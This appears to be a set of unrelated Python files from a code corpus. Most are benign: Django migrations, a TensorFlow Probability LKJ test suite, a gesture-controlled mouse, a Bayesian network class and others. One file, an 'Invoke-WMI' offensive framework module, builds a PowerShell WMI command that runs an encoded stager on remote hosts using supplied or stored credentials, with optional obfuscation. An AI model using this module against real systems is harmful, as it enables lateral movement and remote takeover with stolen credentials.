raise MigrationSchemaMissing("Unable to create the django_migrations table (%s)" % exc)
def applied_migrations(self):
"""
Return a dict mapping (app_name, migration_name) to Migration instances
for all applied migrations.
"""
if self.has_table():
return {(migration.app, migration.name): migration for migration in self.migration_qs}
else:
# If the django_migrations table doesn't exist, then no migrations
# are applied.
return {}
def record_applied(self, app, name):
"""Record that a migration was applied."""
self.ensure_schema()
self.migration_qs.create(app=app, name=name)
def record_unapplied(self, app, name):
"""Record that a migration was unapplied."""
self.ensure_schema()
self.migration_qs.filter(app=app, name=name).delete()
def flush(self):
"""Delete all migration records. Useful for testing migrations."""
self.migration_qs.all().delete()
|
py | 1a37c7ba2d228caef670de2aefc502f114329be0 | from __future__ import absolute_import, division, print_function
from cfn_model.model.ModelElement import ModelElement
class EC2NetworkInterface(ModelElement):
"""
Ec2 network interface model lement
"""
def __init__(self, cfn_model):
"""
Initialize
:param cfn_model:
"""
ModelElement.__init__(self, cfn_model)
self.groupSet= []
self.ipv6Addresses= []
self.privateIpAddresses= []
self.tags= []
self.security_groups= []
self.resource_type = 'AWS::EC2::NetworkInterface'
|
py | 1a37c84094316db24fcdcfa44f64bb522df9d49f | from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-WMI',
'Author': ['@harmj0y'],
'Description': ('Executes a stager on remote hosts using WMI.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'CredID' : {
'Description' : 'CredID from the store to use.',
'Required' : False,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Host[s] to execute the stager on, comma separated.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserName' : {
'Description' : '[domain\]username to use to execute command.',
'Required' : False,
'Value' : ''
},
'Password' : {
'Description' : 'Password to use to execute command.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
userName = self.options['UserName']['Value']
password = self.options['Password']['Value']
script = """$null = Invoke-WmiMethod -Path Win32_process -Name create"""
# if a credential ID is specified, try to parse
credID = self.options["CredID"]['Value']
if credID != "":
if not self.mainMenu.credentials.is_credential_valid(credID):
print(helpers.color("[!] CredID is invalid!"))
return ""
(credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]
if domainName != "":
self.options["UserName"]['Value'] = str(domainName) + "\\" + str(userName)
else:
self.options["UserName"]['Value'] = str(userName)
if password != "":
self.options["Password"]['Value'] = password
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print(helpers.color("[!] Invalid listener: " + listenerName))
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
return ""
else:
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
# build the WMI execution string
computerNames = "\"" + "\",\"".join(self.options['ComputerName']['Value'].split(",")) + "\""
script += " -ComputerName @("+computerNames+")"
script += " -ArgumentList \"" + stagerCode + "\""
# if we're supplying alternate user credentials
if userName != '':
script = "$PSPassword = \""+password+"\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Management.Automation.PSCredential(\""+userName+"\",$PSPassword);" + script + " -Credential $Credential"
script += ";'Invoke-Wmi executed on " +computerNames +"'"
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
|
py | 1a37c977bee3a9087e7b147b41fa864c5f30dd78 | import numpy as np,pandas as pd
def generate_data(POINTS_PER_CLUSTER,CLUSTERS):
data_x = []
data_y = []
for i in range(CLUSTERS):
noise_y = 2*np.random.rand(POINTS_PER_CLUSTER)
noise_x = 2*np.random.rand(POINTS_PER_CLUSTER)
temp_x = 4*i
temp_y = np.random.randint(-50,50)
for j in range(POINTS_PER_CLUSTER):
data_x.append(noise_x[j]+temp_x)
data_y.append(noise_y[j]+temp_y)
return data_x,data_y
|
py | 1a37c9e2961ce2be745779807de472a59bf35d97 | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for the LKJ distribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
from absl.testing import parameterized
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.distributions.internal import statistical_testing as st
tfd = tfp.distributions
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import,g-import-not-at-top
def _det_ok_mask(x, det_bounds, input_output_cholesky=False):
if input_output_cholesky:
logdet = 2.0 * tf.reduce_sum(
input_tensor=tf.math.log(tf.linalg.diag_part(x)), axis=[-1])
else:
_, logdet = tf.linalg.slogdet(x)
return tf.cast(tf.exp(logdet) > det_bounds, dtype=x.dtype)
# Each leaf entry here is a confidence interval for the volume of some
# set of correlation matrices. To wit, k-by-k correlation matrices
# whose determinant is at least d appear as volume_bounds[k][d].
# These particular confidence intervals were estimated by the
# Clopper-Pearson method applied to 10^7 rejection samples, with an
# error probability of 5e-7. This computation may be performed by
# executing the correlation_matrix_volumes program with argument
# --num_samples 1e7. Doing so took about 45 minutes on a standard
# workstation.
volume_bounds = {
3: {0.01: (04.8334339757361420, 4.845866340472709),
0.25: (02.9993127232473036, 3.011629093880439),
0.30: (02.6791373340121916, 2.691146382760893),
0.35: (02.3763254004846030, 2.3879545568875358),
0.40: (02.0898224112869355, 2.1010041316917913),
0.45: (01.8202389505755674, 1.8309117190894892)},
4: {0.01: (10.983339932556953, 11.060156130783517),
0.25: (03.4305021152837020, 3.4764695469900464),
0.30: (02.6624323207206930, 2.703204389589173),
0.35: (02.0431263321809440, 2.0790437132708752),
0.40: (01.5447440594930320, 1.5761221057556805),
0.45: (01.1459065289947180, 1.1730410135527702)},
5: {0.01: (19.081135276668707, 19.523821224876603),
0.20: (02.8632254471072285, 3.0376848112309776),
0.25: (01.8225680180604158, 1.9623522646052605),
0.30: (01.1299612119639912, 1.2406126830051296),
0.35: (00.6871928383147943, 0.7740705901566753),
0.40: (00.4145900446719042, 0.482655106057178)}}
@test_util.run_all_in_graph_and_eager_modes
@parameterized.parameters(np.float32, np.float64)
class LKJTest(parameterized.TestCase, tf.test.TestCase):
def testNormConst2D(self, dtype):
expected = 2.
# 2x2 correlation matrices are determined by one number between -1
# and 1, so the volume of density 1 over all of them is 2.
answer = self.evaluate(tfd.LKJ(2, dtype([1.]))._log_normalization())
self.assertAllClose(answer, np.log([expected]))
def testNormConst3D(self, dtype):
expected = np.pi**2 / 2.
# 3x3 correlation matrices are determined by the three
# lower-triangular entries. In addition to being between -1 and
# 1, they must also obey the constraint that the determinant of
# the resulting symmetric matrix is non-negative. The post
# https://psychometroscar.com/the-volume-of-a-3-x-3-correlation-matrix/
# derives (with elementary calculus) that the volume of this set
# (with respect to Lebesgue^3 measure) is pi^2/2. The same result
# is also obtained by Rousseeuw, P. J., & Molenberghs,
# G. (1994). "The shape of correlation matrices." The American
# Statistician, 48(4), 276-279.
answer = self.evaluate(tfd.LKJ(3, dtype([1.]))._log_normalization())
self.assertAllClose(answer, np.log([expected]))
def _testSampleLogProbExact(self,
concentrations,
det_bounds,
dim,
means,
num_samples=int(1e5),
dtype=np.float32,
target_discrepancy=0.1,
input_output_cholesky=False,
seed=42):
# For test methodology see the comment in
# _testSampleConsistentLogProbInterval, except that this test
# checks those parameter settings where the true volume is known
# analytically.
concentration = np.array(concentrations, dtype=dtype)
det_bounds = np.array(det_bounds, dtype=dtype)
means = np.array(means, dtype=dtype)
# Add a tolerance to guard against some of the importance_weights exceeding
# the theoretical maximum (importance_maxima) due to numerical inaccuracies
# while lower bounding the determinant. See corresponding comment in
# _testSampleConsistentLogProbInterval.
high_tolerance = 1e-6
testee_lkj = tfd.LKJ(
dimension=dim,
concentration=concentration,
input_output_cholesky=input_output_cholesky,
validate_args=True)
x = testee_lkj.sample(num_samples, seed=seed)
importance_weights = (
tf.exp(-testee_lkj.log_prob(x)) * _det_ok_mask(x, det_bounds,
input_output_cholesky))
importance_maxima = (1. / det_bounds) ** (concentration - 1) * tf.exp(
testee_lkj._log_normalization())
chk1 = st.assert_true_mean_equal_by_dkwm(
importance_weights, low=0., high=importance_maxima + high_tolerance,
expected=means, false_fail_rate=1e-6)
chk2 = tf.compat.v1.assert_less(
st.min_discrepancy_of_true_means_detectable_by_dkwm(
num_samples,
low=0.,
high=importance_maxima + high_tolerance,
false_fail_rate=1e-6,
false_pass_rate=1e-6), dtype(target_discrepancy))
self.evaluate([chk1, chk2])
def testSampleConsistentLogProb2(self, dtype):
concentrations = np.array([
1.00, 1.30, 1.50, 1.70, 1.90, 2.00, 2.10, 2.50, 3.00])
det_bounds = np.array([
0.01, 0.25, 0.30, 0.40, 0.50, 0.50, 0.50, 0.70, 0.70])
exact_volumes = 2 * np.sqrt(1. - det_bounds)
for input_output_cholesky in [True, False]:
self._testSampleLogProbExact(
concentrations,
det_bounds,
2,
exact_volumes,
num_samples=int(1.1e5),
dtype=dtype,
input_output_cholesky=input_output_cholesky,
target_discrepancy=0.05,
seed=41)
def _testSampleConsistentLogProbInterval(self,
concentrations,
det_bounds,
dim,
num_samples=int(1e5),
dtype=np.float32,
input_output_cholesky=False,
false_fail_rate=1e-6,
target_discrepancy=0.1,
seed=42):
# Consider the set M of dim x dim correlation matrices whose
# determinant exceeds some bound (rationale for bound forthwith).
# - This is a (convex!) shape in dim * (dim - 1) / 2 dimensions
# (because a correlation matrix is determined by its lower
# triangle, and the main diagonal is all 1s).
# - Further, M is contained entirely in the [-1,1] cube,
# because no correlation can fall outside that interval.
#
# We have two different ways to estimate the volume of M:
# - Importance sampling from the LKJ distribution
# - Importance sampling from the uniform distribution on the cube
#
# This test checks that these two methods agree. However, because
# the uniform proposal leads to many rejections (thus slowness),
# those volumes are computed offline and the confidence intervals
# are presented to this test procedure in the "volume_bounds"
# table.
#
# Why place a lower bound on the determinant? Because for eta > 1,
# the density of LKJ approaches 0 as the determinant approaches 0.
# However, the test methodology requires an upper bound on the
# improtance weights produced. Rejecting matrices with too-small
# determinant (from both methods) allows me to supply that bound.
#
# I considered several alternative regions whose volume I might
# know analytically (without having to do rejection).
# - Option a: Some hypersphere guaranteed to be contained inside M.
# - Con: I don't know a priori how to find a radius for it.
# - Con: I still need a lower bound on the determinants that appear
# in this sphere, and I don't know how to compute it.
# - Option b: Some trapezoid given as the convex hull of the
# nearly-extreme correlation matrices (i.e., those that partition
# the variables into two strongly anti-correclated groups).
# - Con: Would have to dig up n-d convex hull code to implement this.
# - Con: Need to compute the volume of that convex hull.
# - Con: Need a bound on the determinants of the matrices in that hull.
# - Option c: Same thing, but with the matrices that make a single pair
# of variables strongly correlated (or anti-correlated), and leaves
# the others uncorrelated.
# - Same cons, except that there is a determinant bound (which
# felt pretty loose).
lows = [dtype(volume_bounds[dim][db][0]) for db in det_bounds]
highs = [dtype(volume_bounds[dim][db][1]) for db in det_bounds]
concentration = np.array(concentrations, dtype=dtype)
det_bounds = np.array(det_bounds, dtype=dtype)
# Due to possible numerical inaccuracies while lower bounding the
# determinant, the maximum of the importance weights may exceed the
# theoretical maximum (importance_maxima). We add a tolerance to guard
# against this. An alternative would have been to add a threshold while
# filtering in _det_ok_mask, but that would affect the mean as well.
high_tolerance = 1e-6
testee_lkj = tfd.LKJ(
dimension=dim,
concentration=concentration,
input_output_cholesky=input_output_cholesky,
validate_args=True)
x = testee_lkj.sample(num_samples, seed=seed)
importance_weights = (
tf.exp(-testee_lkj.log_prob(x)) * _det_ok_mask(x, det_bounds,
input_output_cholesky))
importance_maxima = (1. / det_bounds) ** (concentration - 1) * tf.exp(
testee_lkj._log_normalization())
check1 = st.assert_true_mean_in_interval_by_dkwm(
samples=importance_weights,
low=0.,
high=importance_maxima + high_tolerance,
expected_low=lows,
expected_high=highs,
false_fail_rate=false_fail_rate)
check2 = tf.compat.v1.assert_less(
st.min_discrepancy_of_true_means_detectable_by_dkwm(
num_samples,
low=0.,
high=importance_maxima + high_tolerance,
false_fail_rate=false_fail_rate,
false_pass_rate=false_fail_rate), dtype(target_discrepancy))
self.evaluate([check1, check2])
def testSampleConsistentLogProbInterval3(self, dtype):
# The hardcoded volume boundaries are (5e-7)-confidence intervals
# of a rejection sampling run. Ergo, I only have 5e-7 probability
# mass left for the false fail rate of the test so the aggregate
# false fail probability is 1e-6.
concentrations = [
1.00, 1.30, 1.50, 1.70, 1.90, 2.00, 2.10, 2.50, 3.00]
det_bounds = [
0.01, 0.25, 0.25, 0.30, 0.35, 0.35, 0.35, 0.40, 0.45]
for input_output_cholesky in [True, False]:
self._testSampleConsistentLogProbInterval(
concentrations,
det_bounds,
3,
dtype=dtype,
input_output_cholesky=input_output_cholesky,
false_fail_rate=5e-7,
target_discrepancy=0.11,
seed=40)
def testSampleConsistentLogProbInterval4(self, dtype):
# The hardcoded volume boundaries are (5e-7)-confidence intervals
# of a rejection sampling run. Ergo, I only have 5e-7 probability
# mass left for the false fail rate of the test so the aggregate
# false fail probability is 1e-6.
concentrations = [
1.00, 1.30, 1.50, 1.70, 1.90, 2.00, 2.10, 2.50, 3.00]
det_bounds = [
0.01, 0.25, 0.25, 0.30, 0.35, 0.35, 0.35, 0.40, 0.45]
for input_output_cholesky in [True, False]:
self._testSampleConsistentLogProbInterval(
concentrations,
det_bounds,
4,
dtype=dtype,
input_output_cholesky=input_output_cholesky,
false_fail_rate=5e-7,
target_discrepancy=0.22,
seed=39)
def testSampleConsistentLogProbInterval5(self, dtype):
# The hardcoded volume boundaries are (5e-7)-confidence intervals
# of a rejection sampling run. Ergo, I only have 5e-7 probability
# mass left for the false fail rate of the test so the aggregate
# false fail probability is 1e-6.
concentrations = [
1.00, 1.30, 1.50, 1.70, 1.90, 2.00, 2.10, 2.50, 3.00]
det_bounds = [
0.01, 0.20, 0.20, 0.25, 0.30, 0.30, 0.30, 0.35, 0.40]
for input_output_cholesky in [True, False]:
self._testSampleConsistentLogProbInterval(
concentrations,
det_bounds,
5,
dtype=dtype,
input_output_cholesky=input_output_cholesky,
false_fail_rate=5e-7,
target_discrepancy=0.41,
seed=37)
def testDimensionGuard(self, dtype):
testee_lkj = tfd.LKJ(
dimension=3, concentration=dtype([1., 4.]), validate_args=True)
with self.assertRaisesRegexp(ValueError, 'dimension mismatch'):
testee_lkj.log_prob(tf.eye(4))
def testZeroDimension(self, dtype):
testee_lkj = tfd.LKJ(
dimension=0, concentration=dtype([1., 4.]), validate_args=True)
results = testee_lkj.sample(sample_shape=[4, 3])
self.assertEqual(results.shape, [4, 3, 2, 0, 0])
def testOneDimension(self, dtype):
testee_lkj = tfd.LKJ(
dimension=1, concentration=dtype([1., 4.]), validate_args=True)
results = testee_lkj.sample(sample_shape=[4, 3])
self.assertEqual(results.shape, [4, 3, 2, 1, 1])
def testMean(self, dtype):
testee_lkj = tfd.LKJ(dimension=3, concentration=dtype([1., 3., 5.]))
num_samples = 20000
results = testee_lkj.sample(sample_shape=[num_samples])
mean = testee_lkj.mean()
self.assertEqual(mean.shape, [3, 3, 3])
check1 = st.assert_true_mean_equal_by_dkwm(
samples=results, low=-1., high=1.,
expected=mean,
false_fail_rate=1e-6)
check2 = tf.compat.v1.assert_less(
st.min_discrepancy_of_true_means_detectable_by_dkwm(
num_samples,
low=-1.,
high=1.,
# Smaller false fail rate because of different batch sizes between
# these two checks.
false_fail_rate=1e-7,
false_pass_rate=1e-6),
# 4% relative error
0.08)
self.evaluate([check1, check2])
class LKJTestGraphOnly(tf.test.TestCase):
def testDimensionGuardDynamicShape(self):
if tf.executing_eagerly():
return
testee_lkj = tfd.LKJ(
dimension=3, concentration=[1., 4.], validate_args=True)
with self.assertRaisesOpError('dimension mismatch'):
self.evaluate(
testee_lkj.log_prob(
tf.compat.v1.placeholder_with_default(tf.eye(4), shape=None)))
if __name__ == '__main__':
tf.test.main()
|
py | 1a37cb21822a4ae0ead574afa44752019ea6f0f0 | #!/usr/bin/env python
# created by Bruce Yuan on 17-11-27
import functools
from inspect import signature
class Check:
"""
这就是让用户自定义check
这样可以方便扩展,想怎么检查参数就怎么检查参数
"""
def check(self, parameter):
pass
def check(**info):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
sig = signature(func)
bound_arguments = sig.bind(*args, **kwargs)
for name, value in bound_arguments.arguments.items():
# 会优先使用check_class,所以check_class只需要一个
# 这样就表示对所有的参数使用同一个函数去检查
check_func = info.get('check_class', None) or info.get(name)()
if isinstance(check_func, Check):
check_func.check(value)
else:
raise Exception(
"your check class must inherit from the base Check class"
)
return func(*args, **kwargs)
return wrapper
return decorator
def main():
# 自定义的check类必须Check基类继承下来
class MyCheck(Check):
def check(self, parameter):
print("this is the {}".format(parameter))
@check(a=MyCheck)
def test(a):
print(a)
test(1)
if __name__ == '__main__':
main()
|
py | 1a37ce7ec058cd5eaee002065d5f68e48bf2092c | import cv2
import mediapipe as mp
import numpy as np
import pyautogui
from google.protobuf.json_format import MessageToDict
from datetime import datetime
import os
from os import path
import time
from tkinter import *
from tkinter import filedialog
from PIL import Image
from PIL import ImageTk
import imutils
import sys
def hands_detection(frame):
global bclick
global xp, yp
global xclick_menique, yclick_menique
mp_drawing = mp.solutions.drawing_utils
mp_drawing_styles = mp.solutions.drawing_styles
mp_hands = mp.solutions.hands
color_pointer = (255,255,255)
ANCHO_P=1920
ALTO_P=1080
RATIO=ANCHO_P/ALTO_P
X=100
Y=200
xmano_ant=0
ymano_ant=0
b=3
pyautogui.FAILSAFE=False
with mp_hands.Hands(
static_image_mode=False,
max_num_hands=1,
min_detection_confidence=0.5) as hands:
height, width, _ = frame.shape
frame = cv2.flip(frame, 1)
area_width = width - X*2
area_height = int(area_width/RATIO)
aux = np.zeros(frame.shape, np.uint8)
aux = cv2.rectangle(aux,(X,Y),(X + area_width, Y + area_height), (255, 0, 0),-1)
output=cv2.addWeighted(frame,1,aux,0.7,0)
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
results = hands.process(frame_rgb)
if results.multi_hand_landmarks is not None:
for hand_landmarks in results.multi_hand_landmarks:
# Get hand data
handesness_dict = MessageToDict(results.multi_handedness[0])
# Type of hand (left or right)
type_hand = handesness_dict['classification'][0]['label']
# level of certainty
certainty_score = handesness_dict['classification'][0]['score']
# If the prediction is not
if(certainty_score<0.9):
continue
#MEDICION DE LOS PUNTOS DE LAS MANOS
xmano = int(hand_landmarks.landmark[0].x * width)
ymano = int(hand_landmarks.landmark[0].y * height)
xbase = int(hand_landmarks.landmark[4].x * width)
ybase = int(hand_landmarks.landmark[4].y * height)
xindice = int(hand_landmarks.landmark[8].x * width)
yindice = int(hand_landmarks.landmark[8].y * height)
xmedio = int(hand_landmarks.landmark[12].x * width)
ymedio = int(hand_landmarks.landmark[12].y * height)
xanular = int(hand_landmarks.landmark[16].x * width)
yanular = int(hand_landmarks.landmark[16].y * height)
xmenique = int(hand_landmarks.landmark[20].x * width)
ymenique = int(hand_landmarks.landmark[20].y * height)
#MEDICIONES ENTRE BASE Y DEDO
xclick_indice = xbase-xindice
yclick_indice = ybase-yindice
xclick_medio = xbase - xmedio
yclick_medio = ybase - ymedio
xclick_menique = xbase - xmenique
yclick_menique = ybase - ymenique
xclick_anular = xbase - xanular
yclick_anular = ybase - yanular
distancia_indice = int((xclick_indice**2 + yclick_indice**2)**(1/2))
distancia_medio = int((xclick_medio ** 2 + yclick_medio ** 2) ** (1 / 2))
distancia_anular = int((xclick_anular ** 2 + yclick_anular ** 2) ** (1 / 2))
distancia_menique = int((xclick_menique ** 2 + yclick_menique ** 2)** (1 / 2))
# Move mouse pointer with both hands
if((xmano<= xmano_ant-b) | (xmano>=xmano_ant+b)):
xmano_ant = xmano
if ((ymano <= ymano_ant - b) | (ymano >= ymano_ant + b)):
ymano_ant = ymano
xp = np.interp(xmano_ant, (X,X+ area_width), (0,ANCHO_P))
yp = np.interp(ymano_ant, (Y, Y + area_height), (0, ALTO_P))
pyautogui.moveTo(int(xp),int(yp))
# The right hand will have the mouse options
if(type_hand == 'Right'):
# Left click
if(distancia_indice<=50):
if(bclick[0]==False):
print("Click")
pyautogui.leftClick()
bclick[0]=True
if(distancia_indice>=60):
if(bclick[0]==True):
bclick[0]=False
# Middle click
if (distancia_medio<=50):
if (bclick[1] == False):
print("Click")
pyautogui.middleClick()
bclick[1] = True
if (distancia_medio>=60):
if (bclick[1] == True):
bclick[1] = False
# Right click
if (distancia_anular<=50):
if (bclick[2] == False):
print("Click")
pyautogui.rightClick()
bclick[2] = True
if (distancia_anular>=60):
if (bclick[2] == True):
bclick[2] = False
# Drag
if (distancia_menique<=50):
if (bclick[3] == False):
print("Arrastrar")
pyautogui.mouseDown()
bclick[3] = True
else:
pyautogui.moveTo(xp, yp)
if (distancia_menique>=60):
if (bclick[3] == True):
pyautogui.mouseUp()
bclick[3] = False
# The left hand will be able to set audio, brightness, etc
else:
# Volume up
if(distancia_indice<=30):
if(bclick[0]==False):
print("Volume up")
pyautogui.press("volumeup")
bclick[0]=True
if(distancia_indice>=40):
if(bclick[0]==True):
bclick[0]=False
# Screenshot
# image will be save in Images folder, under the present
# hour time name
if (distancia_medio<=50):
if (bclick[1] == False):
print("Screenshot")
now = datetime.now()
print(now.strftime("%d-%m-%Y_%H-%M-%S"))
image_name = folder+"/"+now.strftime("%d-%m-%Y_%H-%M-%S")+".png"
pyautogui.screenshot(image_name)
bclick[1] = True
if (distancia_medio>=60):
if (bclick[1] == True):
bclick[1] = False
# Volume down
if (distancia_anular<=30):
if (bclick[2] == False):
print("Volume down")
pyautogui.press("volumedown")
bclick[2] = True
if (distancia_anular>=40):
if (bclick[2] == True):
bclick[2] = False
#Texto rápido
if (distancia_menique<=50):
if (bclick[3] == False):
print("Texto")
pyautogui.typewrite("No puedo contestar por el momento, te marco cuanto me desocupe")
bclick[3] = True
if (distancia_menique>=60):
if (bclick[3] == True):
bclick[3] = False
def visualizar(lblVideo):
global cap
global xp, yp
if cap is not None:
ret, frame = cap.read()
if ret == True:
frame = imutils.resize(frame,width=640)
hands_detection(frame)
frame = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)
im = Image.fromarray(frame)
img = ImageTk.PhotoImage(image=im)
lblVideo.configure(image=img)
lblVideo.image = img
lblVideo.after(1,lambda : visualizar(lblVideo))
else:
lblVideo.image = ""
cap.release()
def iniciar():
global cap
global counter
global bclick
global xp, yp
bclick = np.full((4,1), False)
xp = 0
yp = 0
if counter < 1:
counter+=1
cap = cv2.VideoCapture(0,cv2.CAP_DSHOW)
# Video
video = Toplevel()
lblVideo = Label(video)
lblVideo.grid(column=0,row=0,columnspan=2)
visualizar(lblVideo)
def finalizar():
global cap
if cap is not None:
cap.release()
sys.exit(0)
def main():
global cap
cap = None
global counter
counter = 0
global folder
# Set folder name for screenshots
folder = "./images"
# Check if the folder containing the images exits. If not, create it
if(not path.isdir(folder)):
os.mkdir(folder)
# Start main frame
root = Tk()
root.title('Hands-Free Mouse')
root.iconphoto(False, PhotoImage(file='./icons/icon.png'))
root.geometry('400x300+700+200')
root.configure(bg='black')
# Image
m_im = Image.open("./icons/hand.jpg")
m_im = m_im.resize((300,250), Image.ANTIALIAS)
m_image = ImageTk.PhotoImage(m_im)
main_image = Label(root, image=m_image)
main_image.grid(column=0, row=0, columnspan=2)
main_image.image = m_image
# Create a botton to start the application
btn = Button(root, text="Iniciar", width=25, command=iniciar, bg='white')
btn.grid(column=0,row=1,padx=5,pady=5)
# Create a button to finish the application
btnFinalizar = Button(root, text="Finalizar", width=25, command=finalizar, bg='white')
btnFinalizar.grid(column=1,row=1,padx=5,pady=5)
# Create an event loop
root.mainloop()
# Destroy all
cap.release()
cv2.destroyAllWindows()
if __name__=="__main__":
main()
|
py | 1a37cf1236a7c1839b34ecc48b7610d78bdb728b | import os
from os.path import getsize
import md5, sha
myfile = "C:\\temp\\vobs.tar.gz"
#myfile = "/upload/2006_03_07.0203.tar.gz"
myhandle = open(myfile, "r")
data = myhandle.read()
m = md5.new()
s = sha.new()
m.update(data)
s.update(data)
print "MD5 digest: %s" % m.hexdigest()
print "SHA1 digest: %s" % s.hexdigest()
print "Payload size: %s" % getsize(myfile)
|
py | 1a37cf97aa8210db33a86e00a0246e08dbce3e2b | import numpy as np
from bpn import new, trf
from bpn.utils import get
from numpy.linalg.linalg import inv
def demo():
"""camera, object = demo()"""
d = Dancer()
d.translate((2, 1, 0))
d.turn(30)
d.turn_head(45)
return d
class Dancer:
def __init__(self):
# create dancer
body = new.cone(name='body',r1=0.2, r2=0.2, h=1.5)
body.translate(z=0.75)
body.scale((0.5, 1, 1))
body.apply_matrix()
head = new.cone(name='head', r1=0.2, r2=0, h=0.3)
head.rotate((0.,90.,0.))
head.translate(x=0.1)
head.apply_matrix()
head.translate(z=1.6)
self.gp = []
self.gp.append(body.show_frame())
self.gp.append(head.show_frame())
# create markers
m1 = new.sphere(name='m1', r=0.05)
self.m1_pos = trf.PointCloud((-0.1, 0, 1)) # both body frame and world frame
self.body = body
self.head = head
self.m1 = m1
self.screen = new.empty()
self.screen.frame = self.head.frame
self.screen.translate((1, 0, -0.3))
self.m1viz = new.sphere(name='m1viz', r=0.08)
self._update_m1()
def translate(self, delta=(0., 0., 0.)):
self.body.translate(delta)
self.head.translate(delta)
self.screen.translate(delta)
self._update_m1()
self.body.show_frame()
self.head.show_frame()
self.screen.show_frame()
def turn(self, angle_deg):
self.body.rotate((0., 0., angle_deg))
self.screen.frame = self.screen.frame.transform(trf.m4(trf.twisttf(angle_deg*np.pi/180)), tf_frame=self.head.frame)
self.head.rotate((0., 0., angle_deg))
self._update_m1()
self.body.show_frame()
self.head.show_frame()
self.screen.show_frame()
def turn_head(self, angle_deg):
self.head.rotate((0., 0., angle_deg))
self.screen.frame = self.screen.frame.transform(trf.m4(trf.twisttf(angle_deg*np.pi/180)), tf_frame=self.head.frame)
self.head.show_frame()
self.screen.show_frame()
self._update_m1()
def _update_m1(self):
self.m1.loc = self.m1_pos.transform(self.body.frame.m).co[0]
self.m1viz.loc = (self.screen.frame.m@inv(self.body.frame.m)@np.hstack((self.m1.loc, 1)))[:-1]
# self.m1viz.loc = trf.PointCloud(trf.PointCloud(self.m1.loc).in_frame(self.body.frame.m).co[0], self.screen.frame).in_world().co[0]
def __neg__(self):
-self.body
-self.head
-self.m1
for g in self.gp:
-g
|
py | 1a37d078645cde6410aca3b04ecbd8c314f212dd | """
Bayesian Network class
"""
import pandas as pd
from .conditional_probability_table import ConditionalProbabilityTable as CPT
from .directed_acyclic_graph import DirectedAcyclicGraph
from .markov_network import MarkovNetwork
from .factor import Factor
from .null_graphviz_dag import NullGraphvizDag
class BayesianNetwork(DirectedAcyclicGraph):
"""
Bayesian Network that stores ConditionalProbabilityTables.
Parameters:
cpts: list[ConditionalProbabilityTable]. Optional.
Meant for specifying conditional probability tables of variables
that are endogenous..
priors: list[ConditionalProbabilityTable]. Optional.
Meant for probability tables of Variables that are exogenous.
graphviz_dag: DiGraph
Could be used to display the graph.
"""
def __init__(self, cpts=None, priors=None, graphviz_dag=None):
super().__init__()
if graphviz_dag is None:
self.graphviz_dag = NullGraphvizDag()
else:
self.graphviz_dag = graphviz_dag
if cpts is None:
self.cpts = {}
else:
self.cpts = {}
for cpt in cpts:
self.add_edge(cpt)
if priors:
for prior_cpt in priors:
self.add_node(prior_cpt)
def __repr__(self):
return f"BayesianNetwork(\n\t{self.cpts})"
def add_prior(self, cpt):
"""
Add a conditional probability table. This adds a node.
Parameters
cpt: ConditionalProbabilityTable
"""
self.add_node(cpt)
def set_priors(self, dictionary, data_class, data_storage_folder=None):
"""
Parameters:
dictionary: dict
Ex: {
'prior_var_a': {
'value_it_can_take_1': 0.2,
'value_it_can_take_2': 0.3,
...
}
'prior_var_b': {
'value_it_can_take_1': 0.4,
'value_it_can_take_2': 0.2,
...
}
}
"""
for prior_var, mapping in dictionary.items():
collection = []
for value_prior_var_can_take, proba in mapping.items():
collection.append(
{
prior_var: value_prior_var_can_take,
'value': proba
}
)
df = pd.DataFrame(collection)
givens = list(set(df.columns) - {'value', prior_var})
cpt = CPT(
data_class(
df,
data_storage_folder
),
givens=givens,
outcomes=[prior_var]
)
